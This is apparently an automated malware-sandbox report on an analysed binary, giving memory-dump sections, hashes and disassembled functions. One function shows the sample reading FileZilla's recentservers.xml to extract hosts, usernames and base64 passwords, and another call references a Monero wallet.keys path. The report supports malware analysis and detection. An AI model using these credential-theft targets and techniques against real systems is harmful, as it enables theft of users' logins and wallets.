Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
Instruction ID: 5fdf39579d73fce317170eb5fedd29043b1da37cfde95e2c6dc32a7b1c2cdf02
Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
Instruction Fuzzy Hash: CB9157318287906AEB168B3CDC427BAB795FFE6350F14C31AF98872491FB7195848764

Function 00D4D39E Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
Instruction ID: 8aeec89d4059b112e7fc671cffe303bbed5447955ea51cb9aa42d0f364bb39dd
Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
Instruction Fuzzy Hash: D5A13072A10A19CBEB19CF55CCD1A9EBBB1FB54314F19C62AD41AE73A0D334A944CF60

Function 00D14288 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
Instruction ID: 3f76023a0bfd6191aad79545387ebc052f72ba8483ff7ebde1bb57290131c6a0
Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
Instruction Fuzzy Hash: 77A17E72E083119BD308CF25C89075BF7E2EFC8710F1ACA3DA8A997254D774E9419B82

Function 010D853F Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54060eab983e2b739544f978c6e48b25cec54ee05680abc259edc963f81c09f0
Instruction ID: f84597b178397490e73a6e3322135cf31f0fa7d1472171b9bcf25dd5cdd10d71
Opcode Fuzzy Hash: 54060eab983e2b739544f978c6e48b25cec54ee05680abc259edc963f81c09f0
Instruction Fuzzy Hash: 555169F3E082055BF304A97CDC5477AB6DADBD4320F2B463EEB94D7784E8B998054282

Function 01017221 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208e4a368f9edcb59346fa0ddc5d71992a45757013feff2c756e6464b38b4ae2
Instruction ID: c184ad817c5dd606b440245961f44f32ebe042f958ec8c5c402ad4e1a6cad511
Opcode Fuzzy Hash: 208e4a368f9edcb59346fa0ddc5d71992a45757013feff2c756e6464b38b4ae2
Instruction Fuzzy Hash: 7551F3B36086049FE304AE2ADC8573AFBE6EFD4710F16C93DD6C887354EA3558468682

Function 01118B72 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 815abcbc8e20215d09d90c8e65ba53d2a49d9b80dacd9d2e7b92bcf0d51c3b53
Instruction ID: 68cddbf037a0f8073778622fbb540300f042fb7d1f7d75b4e32f792d52193c5b
Opcode Fuzzy Hash: 815abcbc8e20215d09d90c8e65ba53d2a49d9b80dacd9d2e7b92bcf0d51c3b53
Instruction Fuzzy Hash: E95105B3A083148FE3546E28DC8577AB7E5EF54320F1B453CDAD987780EA3999448787

Function 00D46799 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
Instruction ID: dd59a60897f06397dfb3ba9fffeee4d3a5997ceb541623e09d6651e704aef1c6
Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
Instruction Fuzzy Hash: 2D515962E09BD986C7058B7544502EEBFB21FE6200F1E829EC4991B382C2759689D3F6

Function 012012E4 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e69100a549aa16e180e2e68ac0796a9ce853159a41fb066dda6f23ddf551d38
Instruction ID: 5e39ef86bac98230a9f19cdc3061254a5bd8f64d98143f3f12e2371ccea59d79
Opcode Fuzzy Hash: 2e69100a549aa16e180e2e68ac0796a9ce853159a41fb066dda6f23ddf551d38
Instruction Fuzzy Hash: 493177B251C304AFD311BF68DC866AAFBE9EF18710F06492DE6D4C7610E679A5408A87

Function 00D17588 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54

Function 00CE9AA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 00CE03B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CE8F9B

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

Part of subcall function 00CDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CDA13C
Part of subcall function 00CDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CDA161
Part of subcall function 00CDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00CDA181
Part of subcall function 00CDA110: ReadFile.KERNEL32(000000FF,?,00000000,00CD148F,00000000), ref: 00CDA1AA
Part of subcall function 00CDA110: LocalFree.KERNEL32(00CD148F), ref: 00CDA1E0
Part of subcall function 00CDA110: CloseHandle.KERNEL32(000000FF), ref: 00CDA1EA

Part of subcall function 00CE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CE8FE2

GetProcessHeap.KERNEL32(00000000,000F423F,00CF0DBF,00CF0DBE,00CF0DBB,00CF0DBA), ref: 00CE04C2
RtlAllocateHeap.NTDLL(00000000), ref: 00CE04C9
StrStrA.SHLWAPI(00000000,<Host>), ref: 00CE04E5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CF0DB7), ref: 00CE04F3
StrStrA.SHLWAPI(00000000,<Port>), ref: 00CE052F
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CF0DB7), ref: 00CE053D
StrStrA.SHLWAPI(00000000,<User>), ref: 00CE0579
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CF0DB7), ref: 00CE0587
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00CE05C3
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CF0DB7), ref: 00CE05D5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CF0DB7), ref: 00CE0662
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CF0DB7), ref: 00CE067A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CF0DB7), ref: 00CE0692
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CF0DB7), ref: 00CE06AA
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00CE06C2
lstrcat.KERNEL32(?,profile: null), ref: 00CE06D1
lstrcat.KERNEL32(?,url: ), ref: 00CE06E0
lstrcat.KERNEL32(?,00000000), ref: 00CE06F3
lstrcat.KERNEL32(?,00CF1770), ref: 00CE0702
lstrcat.KERNEL32(?,00000000), ref: 00CE0715
lstrcat.KERNEL32(?,00CF1774), ref: 00CE0724
lstrcat.KERNEL32(?,login: ), ref: 00CE0733
lstrcat.KERNEL32(?,00000000), ref: 00CE0746
lstrcat.KERNEL32(?,00CF1780), ref: 00CE0755
lstrcat.KERNEL32(?,password: ), ref: 00CE0764
lstrcat.KERNEL32(?,00000000), ref: 00CE0777
lstrcat.KERNEL32(?,00CF1790), ref: 00CE0786
lstrcat.KERNEL32(?,00CF1794), ref: 00CE0795
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CF0DB7), ref: 00CE07EE

Strings

url: , xrefs: 00CE06D7
profile: null, xrefs: 00CE06C8
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00CE0404
<User>, xrefs: 00CE0570
login: , xrefs: 00CE072A
browser: FileZilla, xrefs: 00CE06B9
<Host>, xrefs: 00CE04DC
password: , xrefs: 00CE075B
<Port>, xrefs: 00CE0526
<Pass encoding="base64">, xrefs: 00CE05BA

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 7310ff4dc93fa8f368e2e35d3dbc23725c78bfd0c77203e031e69c462dfbf497
Instruction ID: a8117cf115051696bd733ca45931e7871103f5e1fdcf3dbacf2108e3b3b4b69b
Opcode Fuzzy Hash: 7310ff4dc93fa8f368e2e35d3dbc23725c78bfd0c77203e031e69c462dfbf497
Instruction Fuzzy Hash: DED13DB2D00248AFCB04FBE1DD96EEE7379AF15700F508558F506A6091EE70BA49DB61

Function 00CD59B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON

Download Yara Rule

APIs

